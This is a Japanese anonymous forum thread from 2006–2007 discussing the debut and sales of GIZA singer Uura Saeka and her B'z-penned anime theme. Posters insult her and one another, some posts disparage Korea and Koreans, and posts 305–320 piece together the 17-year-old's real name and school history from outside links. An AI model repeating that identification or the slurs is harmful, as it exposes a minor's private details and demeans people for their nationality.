158 :名無しの歌姫:2006/11/26(日) 09:18:11 ID:ppLyAXev
>>157
生でみたら評価が変わるかもね
木曜日のライブに参加したパンオタ連中には、意外と好評だった
これから押していくというオタも多かったよ
以外にも新人では、上木、小田以来の高評価だった


159 :名無しの歌姫:2006/11/26(日) 10:32:56 ID:MtQGHEuU
>>158
小田奈々のどこを評価しろと?w
ちょっと顔が可愛いだけで売れるわけないのにいい加減GIZAも学習しろよw

160 :名無しの歌姫:2006/11/26(日) 10:50:34 ID:ppLyAXev
>>159
GIZAがいやならavexアーでも応援してろw
お前はなぜGIZAにこだわる、レコード会社は一つじゃないよ
GIZAスタッフは、毎週パン工場に来てくれるファンの考えは聞くが
2chで文句ばかりの香具師の考えは聞かないよw


161 :名無しの歌姫:2006/11/26(日) 10:58:23 ID:MtQGHEuU
>>160
しめじとマルクがGIZAにいるからだよ。

162 :名無しの歌姫:2006/11/26(日) 23:49:29 ID:uDOyfttD
12月27日にデビューで、もし1月にアヤカシ出すとしたら
松橋未樹と同じパターン

163 :名無しの歌姫:2006/11/28(火) 00:13:00 ID:fC14OVTs
>>131
B'z稲葉浩志提供楽曲
「Sha la la -アヤカシNIGHT-」 2ndシングルとして1月リリース決定
同時発売 稲葉浩志「赤い糸」カップリングに稲葉ver収録

まさに上木彩矢と全く同じ売り方
・デビュー曲が深夜音楽番組オープニング
・何故か、2ndで売り出そうとする。
・2ndにB'zが関わる。
・カバー。 上木の場合は上木がカバー、宇浦の場合は稲葉がカバー

ソースは?

164 :名無しの歌姫:2006/11/28(火) 00:40:21 ID:i8hwTDV3
>>163
脳内

165 :名無しの歌姫:2006/11/28(火) 20:49:05 ID:GwmYE5/w
フレッツでパンLIVE見たが
なぜ稲葉が宇浦冴香に曲を提供したのか理由がわからん・・・

ルックス→その辺歩いてるJKレベル
歌唱力→中の下

166 :名無しの歌姫:2006/11/28(火) 21:39:07 ID:eVXqO3V3
>>165
稲葉の優しさ

167 :名無しの歌姫:2006/11/28(火) 22:10:24 ID:GwmYE5/w
>>166
なるほど
稲葉って教師の資格持っているだけあって
女子学生に親切なんだな

168 :名無しの歌姫:2006/11/29(水) 01:54:28 ID:IQ11Ju2j
マジレスすると宇浦じゃなくても誰でも良かった
結界師の為に書き下ろしただけだから
どうせなら若い女の子という事で宇浦になっただけかと
宇浦には現役女子高生という肩書きがよく使われてる

169 :名無しの歌姫:2006/11/29(水) 02:21:06 ID:Tc3a4ybD
>>168
菅崎や岸本の時も現役中学生、高校生って使われてたな

170 :名無しの歌姫:2006/11/29(水) 10:54:05 ID:AYJMFRfL
>>165
単純に、同じGIZAだからでしょ。
倉木麻衣よりはいいんじゃない?あの人デビューした時、宇多田としか思えなかった。
パクリじゃん。CD聞いてても声小さいし。いつも一緒に歌ってあげてしまう。。ww
それに、なんか外人好きだよな…。なんでプロモはいつも外人しか出てないの?
アイチテルに出てる馬鹿ディアナも出ちゃってるし。。

171 :名無しの歌姫:2006/11/29(水) 11:14:44 ID:G1o/9XSf
稲葉さんすごいよ

172 :名無しの歌姫:2006/11/30(木) 18:56:26 ID:2HXXkcyD
199 :名無しのエリー:2006/11/30(木) 16:02:34 ID:rudPwiei
http://www.hmv.co.jp/product/detail.asp?sku=1199916&image=1
宇浦


173 :名無しの歌姫:2006/12/01(金) 00:07:31 ID:Ma/mAgO6
12月1日になったのに公式HPが開設されません

174 :名無しの歌姫:2006/12/01(金) 19:56:52 ID:DnI7PwJg
未だに開設されてない

175 :名無しの歌姫:2006/12/01(金) 22:55:03 ID:lqHeCMUf
宇浦オフィシャルオープンキタ━━━━━━(゚∀゚)━━━━━━ !!
ttp://uurasaeka.com/

176 :名無しの歌姫:2006/12/02(土) 01:23:54 ID:f7ztsiyM
やっとか

177 :名無しの歌姫:2006/12/02(土) 01:39:26 ID:f5gK4Hxk
中身がなんもない

178 :名無しの歌姫:2006/12/02(土) 01:45:46 ID:f5gK4Hxk
>疾走感溢れるギターサウンドにのせて歌うパワフルでエモーショナルなヴォーカルが彼女の無限大の可能性を感じさせる。

ちなみに上木の文

>大ヒットを記録したアルバム『Secret Code』に続くシングル「眠っていた気持ち 眠っていたココロ」をリリース。
緩急の利いたギター・サウンドと上木彩の情感豊かなヴォーカルが“眠っていた”ものが覚醒する過程、
瞬間をリアルに表現しています。衰えることのない勢いを感じさせるエモーショナルなロック・サウンドに興奮必至です。



179 :名無しの歌姫:2006/12/02(土) 03:19:50 ID:36Cqll2m
何で上木を引き合いに出すのか分からない
よくある文章で上木と宇浦は関係ないし

180 :名無しの歌姫:2006/12/02(土) 10:46:29 ID:18tFF7+7
『パワフルでエモーショナルなヴォーカル』
UURA NIGHTを見るかぎりどこが????
って感じ
宇浦全然声出てないし
リズム感もないし
三枝に次ぐ不良債権になる予感

181 :名無しの歌姫:2006/12/03(日) 00:36:23 ID:s3/15rPT
ジャパカンで知りました
なかなかよさげだね

182 :名無しの歌姫:2006/12/03(日) 15:58:23 ID:efei94wT
がんばれ宇浦さん

183 :名無しの歌姫:2006/12/03(日) 19:05:02 ID:tmvMUtdA
よかた♪

184 :名無しの歌姫:2006/12/03(日) 22:22:03 ID:KN7CtwQY
170cmて背けっこうでかいんだね。

185 :名無しの歌姫:2006/12/05(火) 13:33:31 ID:dneUQhr7
从*´ヮ`)<宇浦冴香と同い年だ

186 :名無しの歌姫:2006/12/05(火) 20:07:20 ID:O0uMVj6S
宇浦冴香 Profile
Birthday:1989.4.1(現在17歳、高校2年生)
Birth Place:千葉県
Blood Type:O型
Height:170cm


1989年4月1日生まれの17歳なのに何で高2なの?
早生まれだから高3のはずじゃないの?
単なる誤植?それとも訳あり?

187 :名無しの歌姫:2006/12/05(火) 21:03:50 ID:zZk+srNX
どっちの学年に入るか選べるんじゃなかったっけ?

188 :名無しの歌姫:2006/12/05(火) 22:26:25 ID:O0uMVj6S
http://oshiete1.goo.ne.jp/kotaeru.php3?q=2033594
就学猶予ってやつかな?

189 :名無しの歌姫:2006/12/05(火) 22:29:22 ID:95PmZT5L
That's HeiseiUmare

190 :名無しの歌姫:2006/12/05(火) 22:39:00 ID:52EX9cJc
足ナガス

191 :名無しの歌姫:2006/12/06(水) 09:51:35 ID:NssM4BPQ
从*・ 。.・)<宇浦冴香のほうが高いんだ。

192 :名無しの歌姫:2006/12/06(水) 23:45:02 ID:YXwosn0B
作詞、作曲稲葉浩志なだけでGIZA新人だと思ってたらビンゴかぁ…。
新人出しても尻つぼみなんだから既存アーに活かせばいいのに

193 :名無しの歌姫:2006/12/07(木) 04:49:37 ID:pU9WDa41
B'zの松本ファン集合〜いてもうたるで♪23
http://aa5.2ch.net/test/read.cgi/nanmin/1165068080/

194 :barienso:2006/12/07(木) 21:28:08 ID:Vy6D8F9o
あんたら最悪。漢字、結界師
だし!歌もアニメも侮辱すんなし

195 :名無しの歌姫:2006/12/08(金) 13:30:26 ID:YY8SphG0

消えろ

196 :名無しの歌姫:2006/12/10(日) 11:49:55 ID:6u9S1WG9
結界師じゃなくて、『銀魂』をあの時間帯にやってほしい。まあ、べつに結界師でも
いいけど、銀魂ってテレ東だから、こっちでは日曜の早朝なんだよね。。。
 銀魂は面白い。絵も綺麗でカッコイイし。東京だけかよ。全国的に放送してほしい。
そして、一番放送を即中止してほしいのが、NHKでやってるチョングムの韓国アニメ。
あんなのゴールデンにやる必要ない!だったら日本昔ばなしをまら再放送しろ!
その方が、子供に一番見てほしいアニメだよ!

197 :名無しの歌姫:2006/12/10(日) 11:53:00 ID:6u9S1WG9
しかも、あのチョングムのアニメ、最初日本が作ったっと思ったほど、
日本アニメそのものだった。あそこまで日本のアニメの技術盗まれてたんだ…。
話の構成も日本アニメに似てたし。最近NHK、良い番組増えてんのに、韓国ドラマや
韓国アニメなんか放送してるから嫌い。それにしても、韓国は反日のくせに、結局いっつも
日本の真似してばっかだなwウケるんだけど。新しく始まったチェオクってやつも、
もろ日本時代劇のパクリだし。

198 :名無しの歌姫:2006/12/10(日) 11:55:00 ID:6u9S1WG9
>>194
だって変じゃん。歌も最近は慣れてきたけど、、なんかな。稲葉が歌った方が
良かったのに。アニメも話は面白いけど、絵と声優が残念。なんか声優しょぼくね?
新人かな?せっかく、話的にはカッコイイのに。
 犬夜叉や銀魂みたいな絵が好き。

199 :名無しの歌姫:2006/12/10(日) 13:23:45 ID:opCmtqDj
デビューシングルのフル音源ないの?

ナレータがうるさくてよく聞こえないし
曇らせすぎる歌い方で全く聞き取れない

聞き取れた人 歌詞おこしてみて

200 :名無しの歌姫:2006/12/10(日) 19:10:31 ID:8oADVcST
死ねじ200

201 :名無しの歌姫:2006/12/14(木) 19:22:16 ID:6BeoKGPo
うたばん、ミュージックステーションに出て欲しい。

あと、来年の紅白歌合戦も。

202 :名無しの歌姫:2006/12/14(木) 21:40:46 ID:H1c/Wyzo
99ぱーむり

203 :名無しの歌姫:2006/12/15(金) 03:00:12 ID:8SZIqCCP
>>201
してほしいしてほしい言うだけだな、この幼稚園児。

204 :名無しの歌姫:2006/12/15(金) 08:04:53 ID:7Ng37GuE
>>203
オマエガナー

205 :名無しの歌姫:2006/12/15(金) 18:56:32 ID:7Ng37GuE
>>203=5歳

206 :名無しの歌姫:2006/12/16(土) 15:49:56 ID:a7ISql8T
5時からフルPVオンエア
ttp://creco.net/pv/?s=1166251385

207 :名無しの歌姫:2006/12/16(土) 16:28:29 ID:t3T2khez
うpお願いします

208 :名無しの歌姫:2006/12/16(土) 18:23:22 ID:o+nZE6iD
涙は見せたくないって発音の仕方が受け付けない

209 :名無しの歌姫:2006/12/16(土) 23:28:56 ID:gqhSczDR
売れる見込み皆無だな
デビューするのやめとけばよかったのに

210 :名無しの歌姫:2006/12/16(土) 23:50:31 ID:jfG8X7kE
死ねじ210

211 :名無しの歌姫:2006/12/17(日) 00:22:30 ID:gZyDxiXJ
>>205
なんだ自分より精神年齢上だと認めたのか。
3歳児知能のオッサンw

212 :名無しの歌姫:2006/12/17(日) 23:20:12 ID:2WXQQcHx
またまた不思議な名前の子、出てきたね

宇浦冴香 って、本名は?

213 :名無しの歌姫:2006/12/17(日) 23:25:47 ID:y44XWQlC
うpよろしくおねがいします

214 :名無しの歌姫:2006/12/17(日) 23:33:53 ID:jOGptksY
腐女子のカラオケレベル。まあ、レーベルがレーベルなので仕方ないか。

215 :名無しの歌姫:2006/12/18(月) 14:12:57 ID:Jh7NEov2
>>212
宇浦って、稲葉ワンダーランドの
「ウ〜ウ〜ラララ」から取ったのかな?

216 :名無しの歌姫:2006/12/18(月) 14:46:05 ID:s3cK7uXa
本名うらさえこー。

217 :211:2006/12/18(月) 20:28:01 ID:0VwuoQu4
嘘です。

あれはいじめなので、このスレから立ち去ります

218 :名無しの歌姫:2006/12/21(木) 01:46:05 ID:UCd8EZOu
>>217
この世から立ち去れ。

219 :名無しの歌姫:2006/12/22(金) 05:07:42 ID:+u/2e3ua
パンライブセトリよろ

220 :218:2006/12/22(金) 08:36:25 ID:IbXIEpfO
嘘です

221 :名無しの歌姫:2006/12/22(金) 11:31:34 ID:p6jJIqoN
>>219
OOMのスレにあったよ。

222 :名無しの歌姫:2006/12/22(金) 12:55:38 ID:KsaQoaLQ
しかし何も年末の忙しいときにデビューしなくてもよさそうなもんだが

223 :名無しの歌姫:2006/12/22(金) 19:17:33 ID:IbE7+KAN
GIZAは1stはあまり良い曲を出さない主義なのかな?
上木の時もそうだったし二枚目以降で力を入れてきそう。
だけどシャララも微妙だし、どうするんだろう?

224 :名無しの歌姫:2006/12/22(金) 23:38:20 ID:F5q5huaa
パメラ路線だったら好きになってたかも

225 :名無しの歌姫:2006/12/23(土) 01:35:39 ID:XnOrDwW+
どうみてもキャラがロックって感じでもないし
どうしたいんかわからん


226 :名無しの歌姫:2006/12/23(土) 16:52:38 ID:kRNQGFd9
あんなの売れるかw

227 :名無しの歌姫:2006/12/25(月) 12:26:23 ID:nP0sPVsG
誰か優しい方、THURSDAY LIVE宇浦ナイトの
Sha la la ―アヤカシNIGHTとピエロ(上木彩矢版) の音源を
Upしていただけないでしょうか?
よろしくお願い致します!!


228 :名無しの歌姫:2006/12/26(火) 15:38:54 ID:KzlxCVY5
ポルノのアポロに似てるな。

229 :名無しの歌姫:2006/12/27(水) 03:49:57 ID:zpCy4mjJ
私からもSha la la ―アヤカシNIGHTとピエロ(上木彩矢版) の音源うpお願いします><

230 :名無しの歌姫:2006/12/27(水) 14:21:31 ID:mN/D4pkh
顔アップでみたけど普通の顔だな
GIZAって最初いつも普通の顔の子達だけどだんだん派手になっていくよなww


231 :名無しの歌姫:2006/12/27(水) 16:52:23 ID:A41MSXbW
タイアップは上木CDTV、宇浦JCD
アヤカシが2ndとすると提供はB'z、稲葉 
3rdはコナンEDにでもなるのか

232 :名無しの歌姫:2006/12/27(水) 22:30:41 ID:HNPZeTv4
若々しい声で好きだけど・・
アヤカシのフル演奏はまだどこでも演奏されてないの?
勿体ナス。

233 :名無しの歌姫:2006/12/28(木) 15:29:27 ID:9D+917xI
>232
テレビで放送されてるのがフル

234 :名無しの歌姫:2006/12/28(木) 17:18:18 ID:3Z33LpLd
それにしてもPVは金かかってないな、。期待の新人と煽ってる割に。

235 :名無しの歌姫:2006/12/28(木) 20:52:48 ID:k+nBZwVI
38位らしいじゃん
50位入らんと思ってたが


236 :名無しの歌姫:2006/12/28(木) 20:53:32 ID:UWCaeGBl
いつもの事だろ?

237 :名無しの歌姫:2006/12/29(金) 06:54:33 ID:8EiwBPjP
>>235
200位にも入らないと思ってた

238 :名無しの歌姫:2006/12/29(金) 07:31:46 ID:PNKqTd5f
金がこれ以上かかるマエに早く引退してくれ

239 :名無しの歌姫:2006/12/29(金) 15:59:19 ID:Qd2XnyPt
>>238
アホか!
宇浦は、岩田と同じスペースクラフト所属だぞ
金は、 スペースクラフトが出してるはず

http://www.spacecraft.co.jp/html/topics.html


240 :名無しの歌姫:2006/12/29(金) 17:09:07 ID:wn8BCNix
スペクラだったのか…
公式がしょぼい理由にも、納得がいく。

241 :名無しの歌姫:2006/12/29(金) 23:42:02 ID:Go2SQn4L
宇浦ファン=B'zファンでok?

242 :名無しの歌姫:2006/12/29(金) 23:51:02 ID:dU19GBk+
は?

243 :名無しの歌姫:2006/12/30(土) 00:31:54 ID:jbTBD/ss
>>237
アヤカシNIGHTと間違えて買ったやつがいたんじゃ?

244 :名無しの歌姫:2006/12/30(土) 07:05:29 ID:Znchtxd8
Sha la la -アヤカシNIGHT-の発売ももうちょっとかな?情報公開をお待ち下さい。
http://kekkaishi.cocolog-nifty.com/blog/

245 :名無しの歌姫:2006/12/30(土) 08:05:56 ID:fvvSiWtg
宇浦は音楽界のナジーム・ハメドだ!

246 :名無しの歌姫:2006/12/31(日) 00:23:23 ID:1uTbYkgI
>>239
スペースクラフトに申し訳ないな

>>241
多分それはない
少ないGIZAならなんでもヲタだと思う


247 :名無しの歌姫:2007/01/01(月) 04:17:58 ID:b6fnPBFU
おめ

248 : ◆DNwC0s8Vzg :2007/01/03(水) 01:38:12 ID:VlzF73Us
宇浦冴香ちゃん、可愛いんじゃないの?

249 :名無しの歌姫:2007/01/03(水) 21:30:37 ID:sF8pG937
歌い方持田香織っぽいな

250 :名無しの歌姫:2007/01/04(木) 16:58:13 ID:Z3EI2kQd
上木の後継者?

251 :名無しの歌姫:2007/01/04(木) 17:08:19 ID:u0CPPhQ+
上木自体が後継されるほどの人物になってないだろ

252 :名無しの歌姫:2007/01/04(木) 17:15:34 ID:urLno7Zy
星田の妹分?

253 :名無しの歌姫:2007/01/04(木) 18:12:16 ID:Xe7Nt3Q0
特大のお年玉くれ

254 :名無しの歌姫:2007/01/04(木) 23:05:48 ID:3B+dos9l
TearsのInstrumental聴いてて思ったんだが、
コーラス、岩井勇一郎か?
知ってる奴いたらヨロ

255 :名無しの歌姫:2007/01/05(金) 01:49:51 ID:GR6WMOFG
オフィ落ちてる


256 :名無しの歌姫:2007/01/05(金) 20:34:52 ID:wUizOx4F
年末のデイリーどうだった?

257 :名無しの歌姫:2007/01/05(金) 21:10:08 ID:v3ghkSZ/
>>254
買ってないから知らんが、先月のパンライブでは岩井さんが神コーラスしてたな。

258 :名無しの歌姫:2007/01/05(金) 21:24:28 ID:zsVYK3UD
>>257
じゃあ多分そうだな
次のシングルからCDケース普通に戻してほしいな


259 :名無しの歌姫:2007/01/06(土) 00:58:56 ID:9ZGsYlKp
今ギザでは、アレがブームだから おそらく次もそう

歌詞カードを出し入れしなくて楽で好き

260 :名無しの歌姫:2007/01/06(土) 02:36:03 ID:1PskD3QY
CDケースが包まさってる袋ごと保存する漏れには
嫌なビニールだったorz

261 :名無しの歌姫:2007/01/06(土) 11:08:52 ID:cY/rKxIz
>>260
神経質すぎると早死にするよw

262 :名無しの歌姫:2007/01/06(土) 14:05:14 ID:wWZqwjJ5
>>260
保存するならもう1枚!

263 :名無しの歌姫:2007/01/07(日) 00:53:43 ID:vV/I+8yx
ウーラは別に歌下手ではないと思うが
意外と評価低いな。。。

264 :名無しの歌姫:2007/01/07(日) 03:59:10 ID:cVK4xnCt
レンタル店で全然見ないんだがレンタルされてないのか?

265 :名無しの歌姫:2007/01/07(日) 15:19:25 ID:Zb0zuKyp
普通のtsutayaとかgeoは新品もレンタルもなし
冊子には載ってたのにね

266 :名無しの歌姫:2007/01/07(日) 21:22:13 ID:19805Bhq
この人整形したよね???

前めっちゃ顔キツかったと思うんだけど。。。

267 :名無しの歌姫:2007/01/08(月) 03:06:17 ID:DAXdZvDW
>>266
ヒント:17歳

268 :名無しの歌姫:2007/01/08(月) 22:15:17 ID:/1NYsSIy
新宿とか渋谷のでかいツタヤではレンタルしてるらしい
俺は近所のインディーズとかもレンタルしちゃってるとこで見つけたので借りた

269 :名無しの歌姫:2007/01/09(火) 14:48:45 ID:LetCds3P
宇浦冴香の曲を手掛けて欲しいといえば・・・
作詞・・・
まこと(シャ乱Q)、牧穂エミ、亜蘭知子、上原あずみ、川島だりあ、yasu(Janne Da Arc)
作曲・・・
小澤正澄(元PAMELAH)、高山征輝(元ZYYG)、後藤康二(元ZYYG)
柴崎浩(元WANDS)、はたけ(シャ乱Q)、 宇徳敬子、yasu(Janne Da Arc)
五十嵐美貴(SHOW-YA)、仙波さとみ(SHOW-YA)
編曲・・・
明石昌夫、小澤正澄、平田祥一郎、鈴木Daichi秀行


270 :名無しの歌姫:2007/01/10(水) 21:45:23 ID:msDwUTQE
ミソノがしょぼくなったような歌声してるよね

271 :名無しの歌姫:2007/01/10(水) 23:31:50 ID:QbN6SVLw
ミソノが細くなったような体型してるよね

272 :名無しの歌姫:2007/01/11(木) 01:03:33 ID:j1aqx32o
顔がZARDに似てる
長戸さんのコレクションがまた増えた

273 :名無しの歌姫:2007/01/11(木) 16:20:22 ID:b4OpI4gC
初登場118位…orz

274 :名無しの歌姫:2007/01/11(木) 18:24:58 ID:BIRBD9qQ
売上枚数は?

275 :名無しの歌姫:2007/01/11(木) 22:10:14 ID:si7wxrkK

996 名前:陽気な名無しさん [sage] 投稿日:2007/01/10(水) 02:54:12 ID:eNTzcuE6    New!!
アヤカシはTVサイズしか作ってないみたいだから
CD出すからフルで作ってくれって言っても
稲葉さん「そんな契約してない」とか言ってそうw

997 名前:陽気な名無しさん [sage] 投稿日:2007/01/10(水) 09:09:01 ID:c5AVTQ+s    New!!
稲葉がそう言ったとしても長戸が稲葉の名前で
続きを作って完成させると思う

276 :名無しの歌姫:2007/01/12(金) 16:45:20 ID:2uEXvhuH
>>274
1344

277 :名無しの歌姫:2007/01/15(月) 18:05:43 ID:Qo3FqH0o
あげ

しかし過疎杉

278 :名無しの歌姫:2007/01/16(火) 01:54:51 ID:qSPlml3m
>>270-271
俺は最近の持田っぽいと思った
もちろん声は出てるが

279 :名無しの歌姫:2007/01/17(水) 15:33:48 ID:V1DiqLiH
MU-GEN #106 1/17(水)〜1/23 (火)O.A

PICK UP1(特集)
【斉田才がチョイス!! 2007年期待の新人】
@ 山田タマル/Sg「My Brand New Eden」
A 植村花菜/Sg「光と影」
B 宇浦冴香/Sg「Tears 〜涙は見せたくない〜」

<Live at hills パン工場>
12/21 X’mas NIGHT
出演:望月美玖、星田紫帆、宇浦冴香


見られる環境の奴らはチェックしとけ

280 :名無しの歌姫:2007/01/20(土) 00:50:26 ID:wqO+hmuN
118位って同じビ―イング制作で、同じ事務所のボンボンブランコより売れてないなぁ。

281 :名無しの歌姫:2007/01/20(土) 00:56:57 ID:TNEd7zEm
それがスペクラクォリティ

282 :名無しの歌姫:2007/01/21(日) 01:13:01 ID:kzJu1QrG
スペクラって岩田さゆりか!!
この会社の音楽部門は弱いねー

283 :名無しの歌姫:2007/01/21(日) 02:12:40 ID:+f6yZF76
CDTV2007年ブレイクすると思うアーティストTOP10
*1 東方神起
*2 RADWIMPS
*3 チャットモンチー
*4 abingdon boys school
*5 JYONGRI
*6 May J.
*7 エイジアエンジニア
*8 SHOUTA.
*9 宇浦冴香
10 COOLON

284 :名無しの歌姫:2007/01/22(月) 18:17:22 ID:+ml8/viF
2nd Single「Sha la la -アヤカシNIGHT-」3/14Release!!
キタ━━━(゚∀゚)━( ゚∀)━(  ゚)━(  )━(゚  )━(∀゚ )━(゚∀゚)━━━!!!!

http://uurasaeka.com/


285 :名無しの歌姫:2007/01/22(月) 18:22:52 ID:+ml8/viF
宇浦冴香 2nd Single「Sha la la -アヤカシNIGHT-」3/14Release!!

☆よみうりテレビ・日本テレビ系全国ネットテレビアニメ「結界師」オープニングテーマ

10代の女性ヴォーカリストの大本命、宇浦冴香。
17歳の無限大のパワーを秘めたガールズロックの新世代シンガー!!
10月〜よみうりテレビ・日本テレビ系全国ネットテレビアニメ「結界師」オープニングテーマとしてO.Aされ、
問い合わせが殺到していた、B'zの稲葉浩志作詞&作曲提供楽曲「Sha la la -アヤカシNIGHT-」を遂にリリース!

1. Sha la la -アヤカシNIGHT-
  作詞&作曲:稲葉浩志 編曲:葉山たけし
2. タイトル未定
3. Sha la la -アヤカシNIGHT-(Instrumental)

GZCA-7088 ¥1,050(tax in)

286 :名無しの歌姫:2007/01/22(月) 19:25:12 ID:rM3tOxxH
なんか売り方が上木と一緒だな。2ndがB'zがらみというところが…。

287 :名無しの歌姫:2007/01/22(月) 20:21:06 ID:z3n4WEbu
そんな風にコジツケたら2ndがアニメ(コナン)タイアップの松橋とも一緒の売り方やん

288 :名無しの歌姫:2007/01/22(月) 21:56:06 ID:oaFMwD1s
どうせ4月から変わるんだろ

289 :名無しの歌姫:2007/01/22(月) 23:21:14 ID:bJI2TLPs
ultra soulと同じ発売日に出すのは偶然か

290 :名無しの歌姫:2007/01/29(月) 19:17:26 ID:dADHsf6v
CMキターーーーーーーーーーーーーーーーーー

291 :名無しの歌姫:2007/01/29(月) 23:13:56 ID:hdT+jzmw
初めてカラーの顔みたけどGIZAぽい顔だな

292 :名無しの歌姫:2007/01/30(火) 22:41:01 ID:nFhEMHkO



/i/|ii!//|!/!i/´i/   .|i |/ノ        i\i!゙、:iヽ|:::|  ヽ 'i  ! ヾi |'!ヽ::::||:::
i i 川i!ハ/" _!   | │        川 ヾ:ii ゙'∨     |    ゙ヾiヽヽ;||::
ノ ノ/リ,,,,,,二三テ=''" ヽノ        ル |ノノヽヾ ノ  、,,,ノ,、     iヽ:::||::::
 /   ̄ ´~~゙''''    ゙''‐- ..,,         ,, ‐'    `゙ヾミッ、,,   ヽ::|::::/
,,イ|                i'        i"         `'‐='   `'|/i!:
 i | :::::::ヽ::::ヽ::::::ヾ::    ゙、        l       〃:::::       i//
  i i \\\\\ヽ     )       ヽ        ′′′   / /:::
!  | i            ,,ィノ  ___ <         :::: :    /:::::/
i!  i i!            /i/  ./    \  \             /::::
゙i!  | i          /⌒' 、 .| ^   ^ ;| '⌒゙i           /::::::/:::
 i  i ゙!         ん、,,__  | .>ノ(、_, )ヽ、.|<そろそろ私も我慢の限界だ
゙、ii! ゙| i           ノ  _! ! -=ニ=- ノ! `i          //:::::/:::::
ヾ!トl ゙i          i  。l '゛.|\`ニニ´/   |         //::::::/::::::
 iiミ! ハ             i  l ,,,,::: :::;;;;;...{ ° ゙、       //::::://::::
 i!ヾ!i ゙、!         , '  |::: ::::ヽ   ..}     |゙ヽ......,.,.,.,,,///://:::/:
 !ヽヾi  i゙、  ___,,,/   }:: :  ;;;::: ::::::::}     レWノ'レi/、//::/:://
、、iヾミヽ ヾ''~川リ i i゙、     {....../   ゝ ::..{        "  ∨ノ / i
! | i ヾ、゙、 ヽ、!i i|ヾ ゙、゙、゙、    }:: :  ;;;::: ::::::::}            /i  ,ニ
ヾ ! ヾ、ヽ ゙ヽi |!iヾ、ヽヽヽ  ノ  ,,,,::: :::;;;;;...{             ,,!r''~ 








293 :名無しの歌姫:2007/02/01(木) 22:38:05 ID:BEvTA082
あだ名は、『うらら』ですか?

294 :名無しの歌姫:2007/02/02(金) 15:02:13 ID:TlUJRvnQ
うりん

295 :名無しの歌姫:2007/02/03(土) 08:37:17 ID:duVUALwV
http://www.music272.tv/program/hills/index.html

【12.21 X'mas NIGHT】
出演:望月美玖(OOM)、星田紫帆、宇浦冴香
「Tears 〜涙は見せたくない〜」宇浦冴香
「Loco-Motion (cover)」宇浦冴香

リピート放送
2/3 27:00〜.2/5 26:00〜.2/7 27:00〜.
2/8 12:00〜.2/9 09:00〜.2/13 25:00〜.
2/14 09:00〜.2/16 19:00〜.2/17 27:00〜.
2/19 26:00〜.2/21 27:00〜.2/22 12:00〜.
2/2 09:00〜.2/27 25:00〜.2/28 09:00〜.

誰かこの番組録画してうpしてちょ

296 :名無しの歌姫:2007/02/06(火) 16:58:54 ID:ZIvvCCwu
>>295
フレッツスクウェアのやつをストリーミング保存しろよ、カス

297 :名無しの歌姫:2007/02/06(火) 17:48:11 ID:AxAMr0Gb
なんかB'zが損してるような気がする
こやつや上木に関わってもブレイクしてくれないし

298 :名無しの歌姫:2007/02/06(火) 18:49:44 ID:zZyrr5z3
これで失敗したら
もうB'zが作詞作曲とかいっても意味なくなるな

299 :名無しの歌姫:2007/02/06(火) 19:05:05 ID:AxAMr0Gb
こいつはもう、上木以上にブレイクするような人材じゃないし、2ndだけ3万くらい売れて終わり
みたいな感じになるのが目に見えてる
そしてB'z関連ももう当分ないだろう

300 : ◆kyoTXHVRLU :2007/02/06(火) 19:09:25 ID:fKf+2Irn
しめじ300

301 :名無しの歌姫:2007/02/06(火) 20:10:32 ID:zM9iAq/E
<TV>
☆テレビ出演決定!!☆
・日本テレビ系「音楽戦士 MUSIC FIGHTER」3/23 O.A

キタ━━━(゚∀゚)━( ゚∀)━(  ゚)━(  )━(゚  )━(∀゚ )━(゚∀゚)━━━!!!!

302 :名無しの歌姫:2007/02/06(火) 20:56:02 ID:kjYd0UAd
エムステまだかい稲葉生コーラスで

303 :名無しの歌姫:2007/02/08(木) 11:37:05 ID:IaPrkVyY
B'z新曲、永遠の翼
http://www.nicovideo.jp/watch?v=uto5uvJfEzOiE


304 :名無しの歌姫:2007/02/11(日) 01:54:16 ID:9AIZRqQZ
売り上げや順位が気になりB'zへの影響を考えてしまうのは、記録続けにいるB'zファンのジレンマなんだろなーかわいそうに。原点は曲が良ければそれでいいのに。

305 :名無しの歌姫:2007/02/11(日) 16:44:25 ID:kX2DcvWM
宇浦冴香って、本名?

306 :名無しの歌姫:2007/02/11(日) 16:53:28 ID:4iOFZArS
>>305
うらさえこ

307 :名無しの歌姫:2007/02/11(日) 20:10:00 ID:kX2DcvWM
>>306
浦冴子?

308 :名無しの歌姫:2007/02/12(月) 02:13:03 ID:8q5+rblw
>>307
漢字まで知らんがな
だいたいそれ自体がせかもしれんし

309 :名無しの歌姫:2007/02/12(月) 11:21:32 ID:d4bzEx1F
4月1日って1つ上の学年の一番最後の日じゃなかったっけ?なんで高校2年?

310 :名無しの歌姫:2007/02/12(月) 13:11:34 ID:bfAR+vTY
またその話題か

311 :名無しの歌姫:2007/02/12(月) 19:10:04 ID:8q5+rblw
やっぱ何度聞いてもアヤカシNIGHTいいな


312 :名無しの歌姫:2007/02/12(月) 19:28:40 ID:bHHFDUMA
稲葉のコーラスだけいいな

313 :名無しの歌姫:2007/02/12(月) 22:18:45 ID:h6cNy2G6
>>309
いや下の学年の一番最初になるよ
と高3が言っとく

314 :名無しの歌姫:2007/02/13(火) 06:09:39 ID:zQjI1AfU
>>309
1年で退学したけどまた復学したから

315 :名無しの歌姫:2007/02/13(火) 09:20:20 ID:w7T+yvNq
>>314
退学したかどうかは、知らないけど
今月のmfm読むと一時期登校拒否してた感じに受け取れる文章だなw
引き篭もりタイプの娘みたいだね
見た目、そうは見えないな


316 :名無しの歌姫:2007/02/13(火) 12:41:14 ID:IvvkZzbw
ttp://blog.livedoor.jp/you_18_crystalmarble/archives/52200680.html
...と 着メロのサイトみたら…宇浦冴香さんって人の曲があってこの子1年まで同じ学校だったんです
モデル活動とかのため退学してしまい,話さないで終わってしまいましたが…。。
前にセブンティ-ンとかにも普通にでてたし…凄いなぁ(♀))気が付いたら歌手にもなって着メロまでありました


livedoorの検索ページにはまだ実名で書いてたの残ってる

317 :名無しの歌姫:2007/02/13(火) 17:31:27 ID:25CE5SzA
>>305
浦彩恵子。
http://bb.watch.impress.co.jp/cda/news/8277.html

318 :名無しの歌姫:2007/02/14(水) 13:14:48 ID:QvR4hRna
>>317
別人じゃない?
本人?

319 :名無しの歌姫:2007/02/14(水) 13:30:17 ID:xB/tH6lJ
>>318
浦彩恵子で色々検索してみたけど
本人みたいだね
「マリンバアンサンブル」観てみたいな


320 :名無しの歌姫:2007/02/14(水) 15:55:38 ID:UbZG0dCa
今と同じくスペクラ所属だし
名前もそう多くいる名前じゃないし
なにより顔も同じだし
本人でしょう。

321 :名無しの歌姫:2007/02/14(水) 19:10:35 ID:ZCkGtzIg
